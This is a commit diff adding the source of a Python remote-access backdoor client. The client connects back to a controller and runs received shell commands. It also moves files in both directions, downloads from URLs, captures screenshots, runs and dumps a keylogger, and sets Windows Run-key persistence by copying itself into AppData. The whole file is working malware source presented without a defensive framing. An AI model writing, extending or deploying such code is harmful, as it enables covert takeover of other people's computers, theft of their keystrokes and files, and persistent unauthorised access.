1
+ import socket
2
+ import json
3
+ import subprocess
4
+ import time
5
+ import os
6
+ import pyautogui #dependency # pip install pyautogui #mss is faster alternative
7
+ import keylogger
8
+ import threading
9
+ import shutil
10
+ import sys
11
+ import requests
12
+ from sys import platform
13
+
14
+ def reliable_send (data ):
15
+ jsondata = json .dumps (data )
16
+ s .send (jsondata .encode ())
17
+
18
+ def reliable_recv ():
19
+ data = ''
20
+ while True :
21
+ try :
22
+ data = data + s .recv (1024 ).decode ().rstrip ()
23
+ return json .loads (data )
24
+ except ValueError :
25
+ continue
26
+
27
+ def download_file (file_name ):
28
+ f = open (file_name , 'wb' )
29
+ s .settimeout (2 )
30
+ chunk = s .recv (1024 )
31
+ while chunk :
32
+ f .write (chunk )
33
+ try :
34
+ chunk = s .recv (1024 )
35
+ except socket .timeout as e :
36
+ break
37
+ s .settimeout (None )
38
+ f .close ()
39
+
40
+ def upload_file (file_name ):
41
+ f = open (file_name , 'rb' )
42
+ s .send (f .read ())
43
+
44
+ def download_url (url ):
45
+ get_response = requests .get (url )
46
+ file_name = url .split ('/' )[- 1 ]
47
+ with open (file_name , 'wb' ) as out_file :
48
+ out_file .write (get_response .content )
49
+
50
+ def screenshot ():
51
+ myScreenshot = pyautogui .screenshot ()
52
+ myScreenshot .save ('.screen.png' )
53
+
54
+ def persist (reg_name , copy_name ):
55
+ file_location = os .environ ['appdata' ] + '\\ ' + copy_name
56
+ try :
57
+ if not os .path .exists (file_location ):
58
+ shutil .copyfile (sys .executable , file_location )
59
+ subprocess .call ('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ' + reg_name + ' /t REG_SZ /d "' + file_location + '"' , shell = True )
60
+ reliable_send ('[+] Created Persistence With Reg Key: ' + reg_name )
61
+ else :
62
+ reliable_send ('[+] Persistence Already Exists' )
63
+ except :
64
+ reliable_send ('[-] Error Creating Persistence With The Target Machine' )
65
+
66
+ def is_admin ():
67
+ global admin
68
+ if platform == 'win32' :
69
+ try :
70
+ temp = os .listdir (os .sep .join ([os .environ .get ('SystemRoot' , 'C:\windows' ), 'temp' ]))
71
+ except :
72
+ admin = '[!!] User Privileges!'
73
+ else :
74
+ admin = '[+] Administrator Privileges!'
75
+ elif platform == "linux" or platform == "linux2" or platform == "darwin" :
76
+ pass
77
+ #TO BE DONE
78
+
79
+ def shell ():
80
+ while True :
81
+ command = reliable_recv ()
82
+ if command == 'quit' :
83
+ break
84
+ elif command == 'background' : #BEGIN
85
+ pass
86
+ elif command == 'help' : #ideally to be removed
87
+ pass
88
+ elif command == 'clear' :
89
+ pass #END
90
+ elif command [:3 ] == 'cd ' :
91
+ os .chdir (command [3 :])
92
+ elif command [:6 ] == 'upload' :
93
+ download_file (command [7 :])
94
+ elif command [:8 ] == 'download' :
95
+ upload_file (command [9 :])
96
+ elif command [:3 ] == 'get' :
97
+ try :
98
+ download_url (command [4 :])
99
+ reliable_send ('[+] Downloaded File From Specified URL!' )
100
+ except :
101
+ reliable_send ('[!!] Download Failed!' )
102
+ elif command [:10 ] == 'screenshot' :
103
+ screenshot ()
104
+ upload_file ('.screen.png' )
105
+ os .remove ('.screen.png' )
106
+ elif command [:12 ] == 'keylog_start' :
107
+ keylog = keylogger .Keylogger ()
108
+ t = threading .Thread (target = keylog .start )
109
+ t .start ()
110
+ reliable_send ('[+] Keylogger Started!' )
111
+ elif command [:11 ] == 'keylog_dump' :
112
+ logs = keylog .read_logs ()
113
+ reliable_send (logs )
114
+ elif command [:11 ] == 'keylog_stop' :
115
+ keylog .self_destruct ()
116
+ t .join ()
117
+ reliable_send ('[+] Keylogger Stopped!' )
118
+ elif command [:11 ] == 'persistence' :
119
+ reg_name , copy_name = command [12 :].split (' ' )
120
+ persist (reg_name , copy_name )
121
+ elif command [:7 ] == 'sendall' :
122
+ subprocess .Popen (command [8 :], shell = True , stdout = subprocess .PIPE , stderr = subprocess .PIPE , stdin = subprocess .PIPE )
123
+ elif command [:5 ] == 'check' :
124
+ try :
125
+ is_admin ()
126
+ reliable_send (admin + ' platform: ' + platform )
127
+ except :
128
+ reliable_send ('Cannot Perform Privilege Check! Platform: ' + platform )
129
+ elif command [:5 ] == 'start' :
130
+ try :
131
+ subprocess .Popen (command [6 :], shell = True )
132
+ reliable_send ('[+] Started!' )
133
+ except :
134
+ reliable_send ('[-] Failed to start!' )
135
+ else :
136
+ execute = subprocess .Popen (command , shell = True , stdout = subprocess .PIPE , stderr = subprocess .PIPE ,stdin = subprocess .PIPE )
137
+ result = execute .stdout .read () + execute .stderr .read ()
138
+ result = result .decode ()
139
+ reliable_send (result )
140
+
141
+ def connection ():
142
+ while True :
143
+ time .sleep (5 )
144
+ try :
145
+ s .connect (('127.0.0.1' , 5555 ))
146
+ # if platform == 'win32': #TO BE DONE
147
+ # persist(reg_name, copy_name)
148
+ shell ()
149
+ s .close ()
150
+ break
151
+ except :
152
+ connection ()
153
+
154
+ s = socket .socket (socket .AF_INET , socket .SOCK_STREAM )
155
+ connection ()
0 commit comments